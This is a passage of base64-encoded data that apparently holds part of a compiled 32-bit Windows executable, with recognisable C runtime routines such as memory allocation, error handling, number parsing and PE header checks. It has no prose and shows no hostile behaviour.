H0TgWAM/3///4PBEFHoftT//1ldw4PAIFD/FQABARBdw4v/VYvsi0UIVjP2O8Z1Hejjk///VlZWVlbHABYAAADoa5P//4PEFIPI/+sDi0AQXl3Di/9Vi+yD7BChHFABEDPFiUX8U1aLdQz2RgxAVw+FNgEAAFbopv///1m7GFgBEIP4/3QuVuiV////WYP4/nQiVuiJ////wfgFVo08hSB7ARDoef///4PgH1nB4AYDB1nrAovDikAkJH88Ag+E6AAAAFboWP///1mD+P90LlboTP///1mD+P50IlboQP///8H4BVaNPIUgewEQ6DD///+D4B9ZweAGAwdZ6wKLw4pAJCR/PAEPhJ8AAABW6A////9Zg/j/dC5W6AP///9Zg/j+dCJW6Pf+///B+AVWjTyFIHsBEOjn/v//g+AfWcHgBgMHWesCi8P2QASAdF3/dQiNRfRqBVCNRfBQ6MEYAACDxBCFwHQHuP//AADrXTP/OX3wfjD/TgR4EosGikw99IgIiw4PtgFBiQ7rDg++RD30VlDoFqn//1lZg/j/dMhHO33wfNBmi0UI6yCDRgT+eA2LDotFCGaJAYMGAusND7dFCFZQ6HgVAABZWYtN/F9eM81b6MCD///Jw4v/Vlcz/423KF0BEP826Lah//+DxwRZiQaD/yhy6F9ew6EcUAEQg8gBM8k5BVRmARAPlMGLwcOL/1WL7IPsEFNWi3UMM9s783QVOV0QdBA4HnUSi0UIO8N0BTPJZokIM8BeW8nD/3UUjU3w6G6F//+LRfA5WBR1H4tFCDvDdAdmD7YOZokIOF38dAeLRfiDYHD9M8BA68qNRfBQD7YGUOjBhf//WVmFwHR9i0Xwi4isAAAAg/kBfiU5TRB8IDPSOV0ID5XCUv91CFFWagn/cAT/FSABARCFwItF8HUQi00QO4isAAAAciA4XgF0G4uArAAAADhd/A+EZf///4tN+INhcP3pWf///+gxkf//xwAqAAAAOF38dAeLRfiDYHD9g8j/6Tr///8zwDldCA+VwFD/dQiLRfBqAVZqCf9wBP8VIAEBEIXAD4U6////67qL/1WL7GoA/3UQ/3UM/3UI6NT+//+DxBBdw8zMVotEJBQLwHUoi0wkEItEJAwz0vfxi9iLRCQI9/GL8IvD92QkEIvIi8b3ZCQQA9HrR4vIi1wkEItUJAyLRCQI0enR29Hq0dgLyXX09/OL8PdkJBSLyItEJBD35gPRcg47VCQMdwhyDztEJAh2CU4rRCQQG1QkFDPbK0QkCBtUJAz32vfYg9oAi8qL04vZi8iLxl7CEABqDGiIMQEQ6H/N//+LTQgz/zvPdi5q4Fgz0vfxO0UMG8BAdR/oFpD//8cADAAAAFdXV1dX6J6P//+DxBQzwOnVAAAAD69NDIvxiXUIO/d1AzP2RjPbiV3kg/7gd2mDPQR7ARADdUuDxg+D5vCJdQyLRQg7BfB6ARB3N2oE6BDR//9ZiX38/3UI6BbZ//9ZiUXkx0X8/v///+hfAAAAi13kO990Ef91CFdT6A2K//+DxAw733VhVmoI/zWsZAEQ/xUIAQEQi9g733VMOT2YaQEQdDNW6Ijk//9ZhcAPhXL///+LRRA7xw+EUP///8cADAAAAOlF////M/+LdQxqBOi0z///WcM733UNi0UQO8d0BscADAAAAIvD6LPM///DahBoqDEBEOhhzP//i10Ihdt1Dv91DOis3///WenMAQAAi3UMhfZ1DFPo34j//1nptwEAAIM9BHsBEAMPhZMBAAAz/4l95IP+4A+HigEAAGoE6B3Q//9ZiX38U+hG0P//WYlF4DvHD4SeAAAAOzXwegEQd0lWU1DoKNX//4PEDIXAdAWJXeTrNVbo99f//1mJReQ7x3Qni0P8SDvGcgKLxlBT/3Xk6HOJ//9T6PbP//+JReBTUOgc0P//g8QYOX3kdUg793UGM/ZGiXUMg8YPg+bwiXUMVlf/NaxkARD/FQgBARCJReQ7x3Qgi0P8SDvGcgKLxlBT/3Xk6B+J//9T/3Xg6M/P//+DxBTHRfz+////6C4AAACDfeAAdTGF9nUBRoPGD4Pm8Il1DFZTagD/NaxkARD/FRABARCL+OsSi3UMi10IagToTs7//1nDi33khf8Phb8AAAA5PZhpARB0LFbo3OL//1mFwA+F0v7//+itjf//OX3gdWyL8P8VHAABEFDoWI3//1mJButfhf8PhYMAAADoiI3//zl94HRoxwAMAAAA63GF9nUBRlZTagD/NaxkARD/FRABARCL+IX/dVY5BZhpARB0NFboc+L//1mFwHQfg/7gds1W6GPi//9Z6DyN///HAAwAAAAzwOjAyv//w+gpjf//6Xz///+F/3UW6BuN//+L8P8VHAABEFDoy4z//4kGWYvH69KL/1WL7FFRU4tdCFZXM/Yz/4l9/Dsc/VBdARB0CUeJffyD/xdy7oP/Fw+DdwEAAGoD6MIWAABZg/gBD4Q0AQAAagPosRYAAFmFwHUNgz3QXwEQAQ+EGwEAAIH7/AAAAA+EQQEAAGi8GgEQuxQDAABTv1hmARBX6OPb//+DxAyFwHQNVlZWVlbo6or//4PEFGgEAQAAvnFmARBWagDGBXVnARAA/xXMAAEQhcB1JmikGgEQaPsCAABW6KHb//+DxAyFwHQPM8BQUFBQUOimiv//g8QUVuj52///QFmD+Dx2OFbo7Nv//4PuOwPGagO5bGkBEGjICgEQK8hRUOjI6v//g8QUhcB0ETP2VlZWVlboY4r//4PEFOsCM/ZooBoBEFNX6OPp//+DxAyFwHQNVlZWVlboP4r//4PEFItF/P80xVRdARBTV+i+6f//g8QMhcB0DVZWVlZW6BqK//+DxBRoECABAGh4GgEQV+ggFAAAg8QM6zJq9P8VvAABEIvYO950JIP7/3QfagCNRfhQjTT9VF0BEP826Dfb//9ZUP82U/8VOAEBEF9eW8nDagPoRhUAAFmD+AF0FWoD6DkVAABZhcB1H4M90F8BEAF1Fmj8AAAA6Cn+//9o/wAAAOgf/v//WVnDzMzMzMzMzMzMzMzMzMyL/1WL7ItNCLhNWgAAZjkBdAQzwF3Di0E8A8GBOFBFAAB17zPSuQsBAABmOUgYD5TCi8Jdw8zMzMzMzMzMzMzMi/9Vi+yLRQiLSDwDyA+3QRRTVg+3cQYz0leNRAgYhfZ2G4t9DItIDDv5cgmLWAgD2Tv7cgpCg8AoO9Zy6DPAX15bXcPMzMzMzMzMzMzMzMyL/1WL7Gr+aMgxARBogIkAEGShAAAAAFCD7AhTVlehHFABEDFF+DPFUI1F8GSjAAAAAIll6MdF/AAAAABoAAAAEOgq////g8QEhcB0VYtFCC0AAAAQUGgAAAAQ6FD///+DxAiFwHQ7i0Akwegf99CD4AHHRfz+////i03wZIkNAAAAAFlfXluL5V3Di0XsiwiLATPSPQUAAMAPlMKLwsOLZejHRfz+////M8CLTfBkiQ0AAAAAWV9eW4vlXcNqCGjoMQEQ6AfH///oCJz//4tAeIXAdBaDZfwA/9DrBzPAQMOLZejHRfz+////6NETAADoIMf//8Po25v//4tAfIXAdAL/0Om0////aghoCDIBEOi7xv///zVsaQEQ6GqZ//9ZhcB0FoNl/AD/0OsHM8BAw4tl6MdF/P7////off///8xoDcIAEOjEmP//WaNsaQEQw4v/VYvsi0UIo3BpARCjdGkBEKN4aQEQo3xpARBdw4v/VYvsi0UIiw1oWAEQVjlQBHQPi/Fr9gwDdQiDwAw7xnLsa8kMA00IXjvBcwU5UAR0AjPAXcP/NXhpARDo2Jj//1nDaiBoKDIBEOgQxv//M/+JfeSJfdiLXQiD+wt/THQVi8NqAlkrwXQiK8F0CCvBdGQrwXVE6HGa//+L+Il92IX/dRSDyP/pYQEAAL5waQEQoXBpARDrYP93XIvT6F3///+L8IPGCIsG61qLw4PoD3Q8g+gGdCtIdBzoVIj//8cAFgAAADPAUFBQUFDo2of//4PEFOuuvnhpARCheGkBEOsWvnRpARChdGkBEOsKvnxpARChfGkBEMdF5AEAAABQ6BSY//+JReBZM8CDfeABD4TYAAAAOUXgdQdqA+hNu///OUXkdAdQ6DnJ//9ZM8CJRfyD+wh0CoP7C3QFg/sEdRuLT2CJTdSJR2CD+wh1QItPZIlN0MdHZIwAAACD+wh1LosNXFgBEIlN3IsNYFgBEIsVXFgBEAPKOU3cfRmLTdxryQyLV1yJRBEI/0Xc69vofJf//4kGx0X8/v///+gVAAAAg/sIdR//d2RT/1XgWesZi10Ii33Yg33kAHQIagDox8f//1nDU/9V4FmD+wh0CoP7C3QFg/sEdRGLRdSJR2CD+wh1BotF0IlHZDPA6LLE///Di/9Vi+yLRQijhGkBEF3Di/9Vi+yLRQijkGkBEF3Di/9Vi+yLRQijlGkBEF3DahBoSDIBEOgzxP//g2X8AP91DP91CP8VSAEBEIlF5Osvi0XsiwCLAIlF4DPJPRcAAMAPlMGLwcOLZeiBfeAXAADAdQhqCP8VrAABEINl5ADHRfz+////i0Xk6CXE///Di/9Vi+yD7BD/dQiNTfDoIHr//w+2RQyLTfSKVRSEVAEddR6DfRAAdBKLTfCLicgAAAAPtwRBI0UQ6wIzwIXAdAMzwECAffwAdAeLTfiDYXD9ycOL/1WL7GoEagD/dQhqAOia////g8QQXcPMzMzMi0QkCItMJBALyItMJAx1CYtEJAT34cIQAFP34YvYi0QkCPdkJBQD2ItEJAj34QPTW8IQAIv/VYvsagpqAP91COg9DgAAg8QMXcPMzFWL7FNWV1VqAGoAaBTGABD/dQjodhoAAF1fXluL5V3Di0wkBPdBBAYAAAC4AQAAAHQyi0QkFItI/DPI6Bh3//9Vi2gQi1AoUotQJFLoFAAAAIPECF2LRCQIi1QkEIkCuAMAAADDU1ZXi0QkEFVQav5oHMYAEGT/NQAAAAChHFABEDPEUI1EJARkowAAAACLRCQoi1gIi3AMg/7/dDqDfCQs/3QGO3QkLHYtjTR2iwyziUwkDIlIDIN8swQAdRdoAQEAAItEswjoSQAAAItEswjoXwAAAOu3i0wkBGSJDQAAAACDxBhfXlvDM8Bkiw0AAAAAgXkEHMYAEHUQi1EMi1IMOVEIdQW4AQAAAMNTUbsQXgEQ6wtTUbsQXgEQi0wkDIlLCIlDBIlrDFVRUFhZXVlbwgQA/9DDahBoaDIBEOjhwf//M8CLXQgz/zvfD5XAO8d1HeiAhP//xwAWAAAAV1dXV1foCIT//4PEFIPI/+tTgz0EewEQA3U4agToqsX//1mJffxT6NPF//9ZiUXgO8d0C4tz/IPuCYl15OsDi3Xkx0X8/v///+glAAAAOX3gdRBTV/81rGQBEP8VTAEBEIvwi8boocH//8Mz/4tdCIt15GoE6HjE//9Zw4v/VYvsg+wMoRxQARAzxYlF/GoGjUX0UGgEEAAA/3UIxkX6AP8VMAEBEIXAdQWDyP/rCo1F9FDo0v3//1mLTfwzzeg3df//ycOL/1WL7IPsNKEcUAEQM8WJRfyLRRCLTRiJRdiLRRRTiUXQiwBWiUXci0UIVzP/iU3MiX3giX3UO0UMD4RfAQAAizV8AAEQjU3oUVD/1osdIAEBEIXAdF6DfegBdViNRehQ/3UM/9aFwHRLg33oAXVFi3Xcx0XUAQAAAIP+/3UM/3XY6PrS//+L8FlGO/d+W4H+8P//f3dTjUQ2CD0ABAAAdy/oGgEAAIvEO8d0OMcAzMwAAOstV1f/ddz/ddhqAf91CP/Ti/A793XDM8Dp0QAAAFDohNP//1k7x3QJxwDd3QAAg8AIiUXk6wOJfeQ5feR02I0ENlBX/3Xk6DJ9//+DxAxW/3Xk/3Xc/3XYagH/dQj/04XAdH+LXcw733QdV1f/dRxTVv915Ff/dQz/FdwAARCFwHRgiV3g61uLHdwAARA5fdR1FFdXV1dW/3XkV/91DP/Ti/A793Q8VmoB6HSy//9ZWYlF4DvHdCtXV1ZQVv915Ff/dQz/0zvHdQ7/deDoHHz//1mJfeDrC4N93P90BYtN0IkB/3Xk6KzX//9Zi0XgjWXAX15bi038M83og3P//8nDzMzMzMzMzMzMzMzMzFGNTCQIK8iD4Q8DwRvJC8FZ6aoCAABRjUwkCCvIg+EHA8EbyQvBWemUAgAAi/9Vi+yLTQhTM9s7y1ZXfFs7DQh7ARBzU4vBwfgFi/GNPIUgewEQiweD5h/B5gYDxvZABAF0NYM4/3Qwgz3QXwEQAXUdK8t0EEl0CEl1E1Nq9OsIU2r16wNTavb/FVgAARCLB4MMBv8zwOsV6FeB///HAAkAAADoX4H//4kYg8j/X15bXcOL/1WL7ItFCIP4/nUY6EOB//+DIADoKIH//8cACQAAAIPI/13DVjP2O8Z8IjsFCHsBEHMai8iD4B/B+QWLDI0gewEQweAGA8H2QAQBdSToAoH//4kw6OiA//9WVlZWVscACQAAAOhwgP//g8QUg8j/6wKLAF5dw2oMaIgyARDoC77//4t9CIvHwfgFi/eD5h/B5gYDNIUgewEQx0XkAQAAADPbOV4IdTZqCujlwf//WYld/DleCHUaaKAPAACNRgxQ6In5//9ZWYXAdQOJXeT/RgjHRfz+////6DAAAAA5XeR0HYvHwfgFg+cfwecGiwSFIHsBEI1EOAxQ/xUEAQEQi0Xk6Mu9///DM9uLfQhqCuilwP//WcOL/1WL7ItFCIvIg+AfwfkFiwyNIHsBEMHgBo1EAQxQ/xUAAQEQXcOL/1WL7IPsEKEcUAEQM8WJRfxWM/Y5NdBeARB0T4M9VF8BEP51BeiWCwAAoVRfARCD+P91B7j//wAA63BWjU3wUWoBjU0IUVD/FUAAARCFwHVngz3QXgEQAnXa/xUcAAEQg/h4dc+JNdBeARBWVmoFjUX0UGoBjUUIUFb/FVAAARBQ/xXcAAEQiw1UXwEQg/n/dKJWjVXwUlCNRfRQUf8VVAABEIXAdI1mi0UIi038M81e6M1w///Jw8cF0F4BEAEAAADr48zMzMzMzMzMzMzMUY1MJAQryBvA99AjyIvEJQDw//87yHIKi8FZlIsAiQQkwy0AEAAAhQDr6WoQaKgyARDoSbz//zPbiV3kagHoQ8D//1mJXfxqA1+JfeA7PeB6ARB9V4v3weYCodxqARADxjkYdESLAPZADIN0D1DoQQsAAFmD+P90A/9F5IP/FHwoodxqARCLBAaDwCBQ/xXIAAEQodxqARD/NAbogHj//1mh3GoBEIkcBkfrnsdF/P7////oCQAAAItF5OgFvP//w2oB6OS+//9Zw4v/VYvsU1aLdQiLRgyLyIDhAzPbgPkCdUCpCAEAAHQ5i0YIV4s+K/iF/34sV1BW6D/q//9ZUOj65v//g8QMO8d1D4tGDITAeQ+D4P2JRgzrB4NODCCDy/9fi0YIg2YEAIkGXovDW13Di/9Vi+xWi3UIhfZ1CVboNQAAAFnrL1bofP///1mFwHQFg8j/6x/3RgwAQAAAdBRW6Nbp//9Q6MMKAABZ99hZG8DrAjPAXl3DahRoyDIBEOj6uv//M/+JfeSJfdxqAejxvv//WYl9/DP2iXXgOzXgegEQD42DAAAAodxqARCNBLA5OHReiwD2QAyDdFZQVujb6P//WVkz0kKJVfyh3GoBEIsEsItIDPbBg3QvOVUIdRFQ6Er///9Zg/j/dB7/ReTrGTl9CHUU9sECdA9Q6C////9Zg/j/dQMJRdyJffzoCAAAAEbrhDP/i3XgodxqARD/NLBW6OTo//9ZWcPHRfz+////6BIAAACDfQgBi0XkdAOLRdzoe7r//8NqAehavf//WcNqAegf////WcOL/1WL7FFWi3UMVujQ6P//iUUMi0YMWaiCdRnot3z//8cACQAAAINODCC4//8AAOk9AQAAqEB0DeiafP//xwAiAAAA6+GoAXQXg2YEAKgQD4SNAAAAi04Ig+D+iQ6JRgyLRgyDZgQAg2X8AFNqAoPg71sLw4lGDKkMAQAAdSzoqOb//4PAIDvwdAzonOb//4PAQDvwdQ3/dQzoKeb//1mFwHUHVujV5f//WfdGDAgBAABXD4SDAAAAi0YIiz6NSAKJDotOGCv4K8uJTgSF/34dV1D/dQzoyOT//4PEDIlF/OtOg8ggiUYM6T3///+LTQyD+f90G4P5/nQWi8GD4B+L0cH6BcHgBgMElSB7ARDrBbgYWAEQ9kAEIHQVU2oAagBR6DDc//8jwoPEEIP4/3Qti0YIi10IZokY6x1qAo1F/FD/dQyL+4tdCGaJXfzoUOT//4PEDIlF/Dl9/HQLg04MILj//wAA6weLwyX//wAAX1teycOL/1WL7IPsEFNWi3UMM9tXi30QO/N1FDv7dhCLRQg7w3QCiRgzwOmDAAAAi0UIO8N0A4MI/4H/////f3Yb6CF7//9qFl5TU1NTU4kw6Kp6//+DxBSLxutW/3UYjU3w6KBu//+LRfA5WBQPhZwAAABmi0UUuf8AAABmO8F2NjvzdA87+3YLV1NW6FJ1//+DxAzoznr//8cAKgAAAOjDev//iwA4Xfx0B4tN+INhcP1fXlvJwzvzdDI7+3cs6KN6//9qIl5TU1NTU4kw6Cx6//+DxBQ4XfwPhHn///+LRfiDYHD96W3///+IBotFCDvDdAbHAAEAAAA4XfwPhCX///+LRfiDYHD96Rn///+NTQxRU1dWagGNTRRRU4ldDP9wBP8V3AABEDvDdBQ5XQwPhV7///+LTQg7y3S9iQHruf8VHAABEIP4eg+FRP///zvzD4Rn////O/sPhl////9XU1boe3T//4PEDOlP////i/9Vi+xqAP91FP91EP91DP91COh8/v//g8QUXcNqAui+qv//WcOL/1WL7IPsFFZX/3UIjU3s6Fxt//+LRRCLdQwz/zvHdAKJMDv3dSzopXn//1dXV1dXxwAWAAAA6C15//+DxBSAffgAdAeLRfSDYHD9M8Dp2AEAADl9FHQMg30UAnzJg30UJH/Di03sU4oeiX38jX4Bg7msAAAAAX4XjUXsUA+2w2oIUOgmBwAAi03sg8QM6xCLkcgAAAAPtsMPtwRCg+AIhcB0BYofR+vHgPstdQaDTRgC6wWA+yt1A4ofR4tFFIXAD4xLAQAAg/gBD4RCAQAAg/gkD485AQAAhcB1KoD7MHQJx0UUCgAAAOs0igc8eHQNPFh0CcdFFAgAAADrIcdFFBAAAADrCoP4EHUTgPswdQ6KBzx4dAQ8WHUER4ofR4uxyAAAALj/////M9L3dRQPtssPtwxO9sEEdAgPvsuD6TDrG/fBAwEAAHQxisuA6WGA+RkPvst3A4PpIIPByTtNFHMZg00YCDlF/HIndQQ7ynYhg00YBIN9EAB1I4tFGE+oCHUgg30QAHQDi30Mg2X8AOtbi138D69dFAPZiV38ih9H64u+////f6gEdRuoAXU9g+ACdAmBffwAAACAdwmFwHUrOXX8diboBHj///ZFGAHHACIAAAB0BoNN/P/rD/ZFGAJqAFgPlcADxolF/ItFEIXAdAKJOPZFGAJ0A/dd/IB9+AB0B4tF9INgcP2LRfzrGItFEIXAdAKJMIB9+AB0B4tF9INgcP0zwFtfXsnDi/9Vi+wzwFD/dRD/dQz/dQg5BTRjARB1B2gAWAEQ6wFQ6Kv9//+DxBRdw4v/VYvsg+wUU1ZX6GSH//+DZfwAgz1gagEQAIvYD4WOAAAAaHwbARD/FUQBARCL+IX/D4QqAQAAizWYAAEQaHAbARBX/9aFwA+EFAEAAFDorob//8cEJGAbARBXo2BqARD/1lDomYb//8cEJEwbARBXo2RqARD/1lDohIb//8cEJDAbARBXo2hqARD/1lDob4b//1mjcGoBEIXAdBRoGBsBEFf/1lDoV4b//1mjbGoBEKFsagEQO8N0TzkdcGoBEHRHUOi1hv///zVwagEQi/DoqIb//1lZi/iF9nQshf90KP/WhcB0GY1N+FFqDI1N7FFqAVD/14XAdAb2RfQBdQmBTRAAACAA6zmhZGoBEDvDdDBQ6GWG//9ZhcB0Jf/QiUX8hcB0HKFoagEQO8N0E1DoSIb//1mFwHQI/3X8/9CJRfz/NWBqARDoMIb//1mFwHQQ/3UQ/3UM/3UI/3X8/9DrAjPAX15bycOL/1WL7ItNCFYz9jvOfB6D+QJ+DIP5A3UUocxfARDrKKHMXwEQiQ3MXwEQ6xvo3HX//1ZWVlZWxwAWAAAA6GR1//+DxBSDyP9eXcOL/1WL7IHsKAMAAKEcUAEQM8WJRfz2BeBeARABVnQIagrol+j//1nouuz//4XAdAhqFui87P//WfYF4F4BEAIPhMoAAACJheD9//+Jjdz9//+Jldj9//+JndT9//+JtdD9//+Jvcz9//9mjJX4/f//ZoyN7P3//2aMncj9//9mjIXE/f//ZoylwP3//2aMrbz9//+cj4Xw/f//i3UEjUUEiYX0/f//x4Uw/f//AQABAIm16P3//4tA/GpQiYXk/f//jYXY/P//agBQ6HBv//+Nhdj8//+DxAyJhSj9//+NhTD9//9qAMeF2Pz//xUAAECJteT8//+JhSz9////FXAAARCNhSj9//9Q/xVsAAEQagPoCKj//8zMzMzMzMzMzFWL7FdWU4tNEAvJdE2LdQiLfQy3QbNatiCNSQCKJgrkigd0JwrAdCODxgGDxwE653IGOuN3AgLmOsdyBjrDdwICxjrgdQuD6QF10TPJOuB0Cbn/////cgL32YvBW15fycMzwFBQagNQagNoAAAAQGiIGwEQ/xUYAAEQo1RfARDDoVRfARBWizU0AAEQg/j/dAiD+P50A1D/1qFQXwEQg/j/dAiD+P50A1D/1l7Di/9Vi+xTVot1CFcz/4PL/zv3dRzo3nP//1dXV1dXxwAWAAAA6GZz//+DxBQLw+tC9kYMg3Q3VuhR9f//VovY6LEDAABW6Lbf//9Q6NgCAACDxBCFwH0Fg8v/6xGLRhw7x3QKUOh6bf//WYl+HIl+DIvDX15bXcNqDGjwMgEQ6MCw//+DTeT/M8CLdQgz/zv3D5XAO8d1Hehbc///xwAWAAAAV1dXV1fo43L//4PEFIPI/+sM9kYMQHQMiX4Mi0Xk6MOw///DVuhW3v//WYl9/FboKv///1mJReTHRfz+////6AUAAADr1Yt1CFbopN7//1nDahBoEDMBEOhEsP//i0UIg/j+dRPo63L//8cACQAAAIPI/+mqAAAAM9s7w3wIOwUIewEQchroynL//8cACQAAAFNTU1NT6FJy//+DxBTr0IvIwfkFjTyNIHsBEIvwg+YfweYGiw8PvkwOBIPhAXTGUOjE8f//WYld/IsH9kQGBAF0Mf91COg48f//WVD/FTAAARCFwHUL/xUcAAEQiUXk6wOJXeQ5XeR0Gehpcv//i03kiQjoTHL//8cACQAAAINN5P/HRfz+////6AkAAACLReTov6///8P/dQjo+vH//1nDi/9Vi+yD7BhT/3UQjU3o6K9l//+LXQiNQwE9AAEAAHcPi0Xoi4DIAAAAD7cEWOt1iV0IwX0ICI1F6FCLRQgl/wAAAFDoAWb//1lZhcB0EopFCGoCiEX4iF35xkX6AFnrCjPJiF34xkX5AEGLRehqAf9wFP9wBI1F/FBRjUX4UI1F6GoBUOjyzP//g8QghcB1EDhF9HQHi0Xwg2Bw/TPA6xQPt0X8I0UMgH30AHQHi03wg2Fw/VvJw4v/VYvsVot1CFdW6Bnw//9Zg/j/dFChIHsBEIP+AXUJ9oCEAAAAAXULg/4CdRz2QEQBdBZqAuju7///agGL+Ojl7///WVk7x3QcVujZ7///WVD/FTQAARCFwHUK/xUcAAEQi/jrAjP/Vug17///i8bB+AWLBIUgewEQg+YfweYGWcZEMAQAhf90DFfoAXH//1mDyP/rAjPAX15dw2oQaDAzARDoD67//4tFCIP4/nUb6Mlw//+DIADornD//8cACQAAAIPI/+mOAAAAM/87x3wIOwUIewEQciHooHD//4k46IZw///HAAkAAABXV1dXV+gOcP//g8QU68mLyMH5BY0cjSB7ARCL8IPmH8HmBosLD75MMQSD4QF0v1DogO///1mJffyLA/ZEMAQBdA7/dQjoy/7//1mJReTrD+grcP//xwAJAAAAg03k/8dF/P7////oCQAAAItF5Oierf//w/91COjZ7///WcOL/1WL7FaLdQiLRgyog3QeqAh0Gv92COjSaf//gWYM9/v//zPAWYkGiUYIiUYEXl3DzMzMzMzMzMzMzMzMzI1C/1vDjaQkAAAAAI1kJAAzwIpEJAhTi9jB4AiLVCQI98IDAAAAdBWKCoPCATrLdM+EyXRR98IDAAAAdesL2FeLw8HjEFYL2IsKv//+/n6LwYv3M8sD8AP5g/H/g/D/M88zxoPCBIHhAAEBgXUcJQABAYF00yUAAQEBdQiB5gAAAIB1xF5fWzPAw4tC/DrDdDaEwHTvOuN0J4TkdOfB6BA6w3QVhMB03DrjdAaE5HTU65ZeX41C/1vDjUL+Xl9bw41C/V5fW8ONQvxeX1vDi/9Wi/GLBoXAdApQ6NFo//+DJgBZg2YEAINmCABew4v/VmoYi/FqAFboRGn//4PEDIvGXsNqDGhQMwEQ6AGs//+DZfwAUf8VRAABEINl5ADrHotF7IsAiwAzyT0XAADAD5TBi8HDi2Xox0XkDgAHgMdF/P7///+LReToCKz//8OL/1WL7ItFCIXAfA47QQR9CYsJjQSBXcIEAGoAagBqAWiMAADA/xUYAQEQzIv/VovxjU4U6Gb///8zwIlGLIlGMIlGNIvGXsOL/1aL8Y1GFFD/FcgAARCNTixe6SD///+L/1WL7FZXi/GNfhRX/xUEAQEQi0Ywi00IO8h/I4XJfB87yHUOi3YIV/8VAAEBEIvG6xZRjU4s6GT///+LMOvoV/8VAAEBEDPAX15dwgQAi/9Wi/Hoc////7gAAAAQjU4UxwY4AAAAiUYIiUYEx0YMAAkAAMdGEKAbARDo1f7//4XAfQfGBdRqARABi8Zew4B5CADHAbAbARB0DotJBIXJdAdR/xXoAAEQw4v/VYvs/3UIagD/cQT/FQgBARBdwgQAi/9Vi+yDfQgAdA7/dQhqAP9xBP8VeAABEF3CBACL/1WL7DPAOUUIdQn/dQyLAf8Q6yE5RQx1DP91CIsB/1AEM8DrEP91DP91CFD/cQT/FRABARBdwggAi/9Vi+z/dQhqAP9xBP8VTAEBEF3CBACL/1WL7FaL8ehT////9kUIAXQHVuhdXv//WYvGXl3CBACL/1WL7IvBi00IiUgExwDEGwEQM8nHQBQCAAAAiUgMiUgQZolIGGaJSBqJQAhdwgQAi/9Vi+yLRQz3ZRCF0ncFg/j/dge4VwAHgF3Di00IiQEzwF3Di/9Vi+yLSQSLAV3/YAQz0o1BFELwD8EQjUEIw4vBw4v/VYvs9kUIAVaL8ccGxBsBEHQHVujHXf//WYvGXl3CBACL/1WL7ItFDItNEIPK/yvQO9FzB7hXAAeAXcMDwYtNCIkBM8Bdw4v/VYvsVot1CFf/dQyDxgiD5viNRQhWUIv56Fb///+DxAyFwHw2/3UIjUUIahBQ6Kb///+DxAyFwHwhi08E/3UIiwH/EIXAdBNOg2AEAIk4x0AMAQAAAIlwCOsCM8BfXl3CCACL/1WL7FaLdQxX/3UQg8YIg+b4jUUMVlCL+ejy/v//g8QMhcB8Lf91DI1FDGoQUOhC////g8QMhcB8GP91DItPBP91CIsB/1AIhcB0Bk6JcAjrAjPAX15dwgwAzP8lFAEBEIv/VYvsUVOLRQyDwAyJRfxkix0AAAAAiwNkowAAAACLRQiLXQyLbfyLY/z/4FvJwggAWFmHBCT/4Iv/VYvsUVFTVldkizUAAAAAiXX8x0X49OAAEGoA/3UM/3X4/3UI6Jb///+LRQyLQASD4P2LTQyJQQRkiz0AAAAAi138iTtkiR0AAAAAX15bycIIAFWL7IPsCFNWV/yJRfwzwFBQUP91/P91FP91EP91DP91COgGDwAAg8QgiUX4X15bi0X4i+Vdw4v/VYvsVvyLdQyLTggzzujtW///agBW/3YU/3YMagD/dRD/dhD/dQjoyQ4AAIPEIF5dw4v/VYvsg+w4U4F9CCMBAAB1Ergx4gAQi00MiQEzwEDpsAAAAINl2ADHRdxd4gAQoRxQARCNTdgzwYlF4ItFGIlF5ItFDIlF6ItFHIlF7ItFIIlF8INl9ACDZfgAg2X8AIll9Ilt+GShAAAAAIlF2I1F2GSjAAAAAMdFyAEAAACLRQiJRcyLRRCJRdDoEHz//4uAgAAAAIlF1I1FzFCLRQj/MP9V1FlZg2XIAIN9/AB0F2SLHQAAAACLA4td2IkDZIkdAAAAAOsJi0XYZKMAAAAAi0XIW8nDi/9Vi+xRU/yLRQyLSAgzTQzo4Vr//4tFCItABIPgZnQRi0UMx0AkAQAAADPAQOts62pqAYtFDP9wGItFDP9wFItFDP9wDGoA/3UQi0UM/3AQ/3UI6JMNAACDxCCLRQyDeCQAdQv/dQj/dQzo/P3//2oAagBqAGoAagCNRfxQaCMBAADoof7//4PEHItF/ItdDItjHItrIP/gM8BAW8nDi/9Vi+xRU1ZXi30Ii0cQi3cMiUX8i97rLYP+/3UF6Drf//+LTfxOi8ZrwBQDwYtNEDlIBH0FO0gIfgWD/v91Cf9NDItdCIl1CIN9DAB9yotFFEaJMItFGIkYO18MdwQ783YF6PXe//+LxmvAFANF/F9eW8nDi/9Vi+yLRQxWi3UIiQboonr//4uAmAAAAIlGBOiUev//ibCYAAAAi8ZeXcOL/1WL7Oh/ev//i4CYAAAA6wqLCDtNCHQKi0AEhcB18kBdwzPAXcOL/1WL7FboV3r//4t1CDuwmAAAAHUR6Ed6//+LTgSJiJgAAABeXcPoNnr//4uAmAAAAOsJi0gEO/F0D4vBg3gEAHXxXl3pS97//4tOBIlIBOvSi/9Vi+yD7BihHFABEINl6ACNTegzwYtNCIlF8ItFDIlF9ItFFEDHRexT4QAQiU34iUX8ZKEAAAAAiUXojUXoZKMAAAAA/3UYUf91EOjJDAAAi8iLRehkowAAAACLwcnDi/9Vi+xWjUUIUIvx6BC6///HBtgsARCLxl5dwgQAxwHYLAEQ6cW6//+L/1WL7FaL8ccG2CwBEOiyuv//9kUIAXQHVuilWP//WYvGXl3CBACL/1WL7FZXi30Ii0cEhcB0R41QCIA6AHQ/i3UMi04EO8F0FIPBCFFS6A1r//9ZWYXAdAQzwOsk9gYCdAX2Bwh08otFEIsAqAF0BfYHAXTkqAJ0BfYHAnTbM8BAX15dw4v/VYvsi0UIiwCLAD1NT0PgdBg9Y3Nt4HUr6OJ4//+DoJAAAAAA6b3c///o0Xj//4O4kAAAAAB+DOjDeP//BZAAAAD/CDPAXcNqEGiwNQEQ6Kaj//+LfRCLXQiBfwSAAAAAfwYPvnMI6wOLcwiJdeTojHj//wWQAAAA/wCDZfwAO3UUdGWD/v9+BTt3BHwF6KDc//+LxsHgA4tPCAPIizGJdeDHRfwBAAAAg3kEAHQViXMIaAMBAABTi08I/3QBBOhGCwAAg2X8AOsa/3Xs6C3///9Zw4tl6INl/ACLfRCLXQiLdeCJdeTrlsdF/P7////oGQAAADt1FHQF6DTc//+JcwjoOKP//8OLXQiLdeTo7Xf//4O4kAAAAAB+DOjfd///BZAAAAD/CMOLAIE4Y3Nt4HU4g3gQA3Uyi0gUgfkgBZMZdBCB+SEFkxl0CIH5IgWTGXUXg3gcAHUR6KF3//8zyUGJiAwCAACLwcMzwMNqCGjYNQEQ6ICi//+LTQiFyXQqgTlj